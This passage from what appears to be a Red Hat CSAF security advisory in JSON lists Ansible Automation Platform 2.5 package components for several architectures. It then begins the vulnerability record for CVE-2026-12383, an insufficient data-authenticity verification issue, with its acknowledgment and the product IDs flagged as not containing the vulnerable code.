"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch"
},
"product_reference": "automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-hub-0:4.10.17-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch"
},
"product_reference": "automation-hub-0:4.10.17-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-hub-0:4.10.17-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src"
},
"product_reference": "automation-hub-0:4.10.17-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64"
},
"product_reference": "python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le"
},
"product_reference": "python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x"
},
"product_reference": "python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src"
},
"product_reference": "python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64"
},
"product_reference": "python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64"
},
"product_reference": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le"
},
"product_reference": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x"
},
"product_reference": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64"
},
"product_reference": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64"
},
"product_reference": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le"
},
"product_reference": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x"
},
"product_reference": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64"
},
"product_reference": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-daphne-0:4.2.2-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch"
},
"product_reference": "python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-daphne-0:4.2.2-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src"
},
"product_reference": "python3.12-daphne-0:4.2.2-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch"
},
"product_reference": "python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-galaxy-ng-0:4.10.17-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src"
},
"product_reference": "python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64"
},
"product_reference": "python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le"
},
"product_reference": "python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x"
},
"product_reference": "python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src"
},
"product_reference": "python3.12-pillow-0:12.3.0-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64"
},
"product_reference": "python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64"
},
"product_reference": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le"
},
"product_reference": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x"
},
"product_reference": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64"
},
"product_reference": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64"
},
"product_reference": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le"
},
"product_reference": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x"
},
"product_reference": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64"
},
"product_reference": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pulpcore-0:3.49.66-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch"
},
"product_reference": "python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pulpcore-0:3.49.66-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src"
},
"product_reference": "python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pyasn1-0:0.6.4-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch"
},
"product_reference": "python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pyasn1-0:0.6.4-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src"
},
"product_reference": "python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64"
},
"product_reference": "receptor-0:1.6.7-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le"
},
"product_reference": "receptor-0:1.6.7-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x"
},
"product_reference": "receptor-0:1.6.7-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src"
},
"product_reference": "receptor-0:1.6.7-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64"
},
"product_reference": "receptor-0:1.6.7-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64"
},
"product_reference": "receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le"
},
"product_reference": "receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x"
},
"product_reference": "receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64"
},
"product_reference": "receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.7-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64"
},
"product_reference": "receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.7-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le"
},
"product_reference": "receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.7-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x"
},
"product_reference": "receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.7-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64"
},
"product_reference": "receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptorctl-0:1.6.7-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
},
"product_reference": "receptorctl-0:1.6.7-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.5"
}
]
},
"vulnerabilities": [
{
"acknowledgments": [
{
"names": [
"Chris Meyers"
],
"organization": "Red Hat",
"summary": "This issue was discovered by Red Hat."
}
],
"cve": "CVE-2026-12383",
"cwe": {
"id": "CWE-345",
"name": "Insufficient Verification of Data Authenticity"
},
"discovery_date": "2026-06-16T10:09:09.069000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
